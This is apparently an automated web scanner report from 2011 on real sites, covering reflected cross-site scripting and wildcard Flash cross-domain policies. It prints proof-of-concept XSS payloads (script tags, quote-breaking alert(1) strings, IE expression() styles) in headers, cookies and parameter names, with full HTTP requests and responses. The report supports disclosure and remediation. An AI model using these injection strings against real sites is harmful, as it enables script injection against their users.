Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de78d"-alert(1)-"b6aa71aa6bb was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31a1d"-alert(1)-"59b4541068d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jspix?anId=144&pubId=19240&campId=161441 HTTP/1.1 Host: pixel.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=31a1d"-alert(1)-"59b4541068d User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=755C60E8161379FBEEA117E61515830A; Path=/ Content-Type: text/javascript Date: Mon, 05 Sep 2011 02:30:55 GMT Connection: close
The value of the sapha_2522_1 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e89c4'%3balert(1)//76f56e1d866 was submitted in the sapha_2522_1 cookie. This input was echoed as e89c4';alert(1)//76f56e1d866 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the server cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2bbe"%20style%3dx%3aexpression(alert(1))%200e696d288b3 was submitted in the server cookie. This input was echoed as b2bbe\" style=x:expression(alert(1)) 0e696d288b3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the server cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b5d7"%20style%3dx%3aexpression(alert(1))%208dda330855a was submitted in the server cookie. This input was echoed as 6b5d7\" style=x:expression(alert(1)) 8dda330855a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
3.134. https://h30046.www3.hp.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://h30046.www3.hp.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20ba3"><script>alert(1)</script>aac61ce975a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /?20ba3"><script>alert(1)</script>aac61ce975a=1 HTTP/1.1 Host: h30046.www3.hp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<html><body>The requested resource was moved. It could be found here: <a href="http://h30046.www3.hp.com/?20ba3"><script>alert(1)</script>aac61ce975a=1">http://h30046.www3.hp.com/?20ba3"><script>alert ...[SNIP]...
3.135. https://h30046.www3.hp.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://h30046.www3.hp.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload aa4b2<script>alert(1)</script>994bc586213 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /?aa4b2<script>alert(1)</script>994bc586213=1 HTTP/1.1 Host: h30046.www3.hp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<html><body>The requested resource was moved. It could be found here: <a href="http://h30046.www3.hp.com/?aa4b2<script>alert(1)</script>994bc586213=1">http://h30046.www3.hp.com/?aa4b2<script>alert(1)</script>994bc586213=1</a> ...[SNIP]...
4. Flash cross-domain policypreviousnext There are 67 instances of this issue:
The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.
Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.
Issue remediation
You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: 142.xg4ken.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: ad.turn.com
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: private Pragma: private Expires: Mon, 05 Sep 2011 02:30:52 GMT Content-Type: text/xml;charset=UTF-8 Date: Mon, 05 Sep 2011 02:30:51 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: afe.specificclick.net
Response
HTTP/1.1 200 OK Server: WebStar 1.0 Content-Type: text/xml Content-Length: 194 Date: Mon, 05 Sep 2011 02:30:53 GMT Connection: close
<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: ajax.googleapis.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: altfarm.mediaplex.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: apps.sapha.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: apr.lijit.com
Response
HTTP/1.1 200 OK Date: Mon, 05 Sep 2011 02:30:52 GMT Server: PWS/1.7.3.3 X-Px: ms lax-agg-n20 ( lax-agg-n10), ms lax-agg-n10 ( origin>CONN) ETag: "a35c9-83-4aad0437c9440" Cache-Control: max-age=604800 Expires: Mon, 12 Sep 2011 02:30:52 GMT Age: 0 Content-Length: 131 Content-Type: application/xml Last-Modified: Thu, 18 Aug 2011 23:49:29 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: cache.specificmedia.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: cdn.turn.com
Response
HTTP/1.0 200 OK Server: Apache-Coyote/1.1 P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Pragma: private Content-Type: text/xml;charset=UTF-8 Cache-Control: private, max-age=0 Expires: Mon, 05 Sep 2011 02:30:58 GMT Date: Mon, 05 Sep 2011 02:30:58 GMT Content-Length: 100 Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: dellinc.tt.omtrdc.net
Response
HTTP/1.1 200 OK Server: Test & Target Content-Type: application/xml Date: Sun, 04 Sep 2011 16:19:15 GMT Accept-Ranges: bytes ETag: W/"201-1313024241000" Connection: close Last-Modified: Thu, 11 Aug 2011 00:57:21 GMT Content-Length: 201
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: eas.apm.emediate.eu
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: fls.doubleclick.net
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: fls.doubleclick.net
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: gacela.eu
Response
HTTP/1.1 200 OK Date: Mon, 05 Sep 2011 01:55:03 GMT Server: Apache Last-Modified: Wed, 24 Aug 2011 13:45:59 GMT ETag: "c1bd87-d1-4ab40884013c0" Accept-Ranges: bytes Content-Length: 209 Connection: close Content-Type: application/xml
<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain- ...[SNIP]...
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: h41174.www4.hp.com
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 22:41:02 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Last-Modified: Thu, 10 Jan 2008 16:02:57 GMT ETag: "66b4b7-d0-4436057df0e40" Accept-Ranges: bytes Content-Length: 208 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/xml
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: ib.adnxs.com
Response
HTTP/1.0 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 16:19:50 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=-1; path=/; expires=Sat, 03-Sep-2016 16:19:50 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/xml
<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only" ...[SNIP]... <allow-access-from domain="*"/> ...[SNIP]...
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: img-cdn.mediaplex.com
Response
HTTP/1.0 200 OK Server: Apache Last-Modified: Fri, 19 Dec 2008 21:38:40 GMT ETag: "1607e7-c7-45e6d21e5d800" Accept-Ranges: bytes Content-Length: 199 Content-Type: text/x-cross-domain-policy Date: Sun, 04 Sep 2011 16:19:15 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: m.webtrends.com
Response
HTTP/1.1 200 OK Content-Length: 82 Content-Type: text/xml Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT Accept-Ranges: bytes ETag: "ef9fe45d4643c81:a1b" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 05 Sep 2011 02:23:11 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: media.fastclick.net
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:13:43 GMT Server: Apache/2.2.4 (Unix) P3P: policyref="/w3c/p3p.xml", CP="NOI NID DEVo TAIo PSAo HISo OTPo OUR DELo BUS COM NAV INT DSP COR" Content-Length: 202 Keep-Alive: timeout=5, max=19943 Connection: Keep-Alive Content-Type: text/xml
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: met1.hp.com
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 16:19:48 GMT Server: Omniture DC/2.0.0 xserver: www606 Connection: close Content-Type: text/html
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: metrics.skype.com
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 17:59:13 GMT Server: Omniture DC/2.0.0 xserver: www385 Connection: close Content-Type: text/html
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: microsoftsto.112.2o7.net
Response
HTTP/1.1 200 OK Date: Mon, 05 Sep 2011 02:23:13 GMT Server: Omniture DC/2.0.0 xserver: www376 Connection: close Content-Type: text/html
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: now.eloqua.com
Response
HTTP/1.1 200 OK Cache-Control: max-age=0 Content-Type: text/xml Last-Modified: Tue, 26 May 2009 19:46:00 GMT Accept-Ranges: bytes ETag: "04c37983adec91:0" P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA", Date: Sun, 04 Sep 2011 16:18:34 GMT Connection: keep-alive Content-Length: 206
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: nsm.dell.com
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 16:19:16 GMT Server: Omniture DC/2.0.0 xserver: www38 Connection: close Content-Type: text/html
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: pixel.33across.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: pixel.adsafeprotected.com
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 ETag: W/"202-1313613444000" Last-Modified: Wed, 17 Aug 2011 20:37:24 GMT Content-Type: application/xml Content-Length: 202 Date: Mon, 05 Sep 2011 02:30:54 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: pixel.mathtag.com
Response
HTTP/1.0 200 OK Cache-Control: no-cache Connection: close Content-Type: text/cross-domain-policy P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x3 pid 0xca1 3233 Connection: keep-alive Content-Length: 215
<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: pixel.quantserve.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: r.turn.com
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: private Pragma: private Expires: Sun, 04 Sep 2011 16:19:50 GMT Content-Type: text/xml;charset=UTF-8 Date: Sun, 04 Sep 2011 16:19:50 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: statse.webtrendslive.com
Response
HTTP/1.1 200 OK Content-Length: 82 Content-Type: text/xml Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT Accept-Ranges: bytes ETag: "ef9fe45d4643c81:6eb" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Sun, 04 Sep 2011 16:19:04 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: sync.mathtag.com
Response
HTTP/1.0 200 OK Cache-Control: no-cache Connection: close Content-Type: text/cross-domain-policy P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x3 pid 0xca8 3240 Connection: keep-alive Content-Length: 215
<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: tags.bluekai.com
Response
HTTP/1.0 200 OK Date: Sun, 04 Sep 2011 16:19:48 GMT Server: Apache/2.2.3 (CentOS) Last-Modified: Wed, 29 Jun 2011 21:44:06 GMT ETag: "38a03db-ca-4a6e0af03f580" Accept-Ranges: bytes Content-Length: 202 Content-Type: text/xml Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: vap1den1.lijit.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: vap1iad1.lijit.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: vap1iad2.lijit.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: vap1sfo1.lijit.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: vap2den1.lijit.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: vap2iad1.lijit.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: vap3den1.lijit.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.cymphonix.com
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 16:19:07 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.3 OpenSSL/0.9.8g mod_perl/2.0.2 Perl/v5.8.8 Last-Modified: Tue, 06 Jan 2009 07:09:52 GMT ETag: "30d8758-69-17f87000" Accept-Ranges: bytes Content-Length: 105 Connection: close Content-Type: application/xml
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.xg4ken.com
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: accessories.us.dell.com
Response
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Thu, 28 May 2009 18:43:47 GMT Accept-Ranges: bytes ETag: "2747823cc4dfc91:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI" Date: Sun, 04 Sep 2011 16:29:05 GMT Connection: close Content-Length: 364
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: adwords.google.com
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /crossdomain.xml HTTP/1.0 Host: blogs.skype.com
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /crossdomain.xml HTTP/1.0 Host: content-cdn.dell.com
Response
HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Thu, 26 Aug 2010 17:13:28 GMT ETag: "2d593b04245cb1:0" P3P: CP=" BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI " Date: Sun, 04 Sep 2011 16:19:08 GMT Content-Length: 270 Connection: close
...<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <!-- Policy file for http://www.dell.com --> <cross-domain-policy>
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /crossdomain.xml HTTP/1.0 Host: content.dell.com
Response
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Thu, 26 Aug 2010 17:13:28 GMT Accept-Ranges: bytes ETag: "2d593b04245cb1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 P3P: CP=" BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI " Date: Sun, 04 Sep 2011 16:19:09 GMT Connection: close Content-Length: 270
...<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <!-- Policy file for http://www.dell.com --> <cross-domain-policy>
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
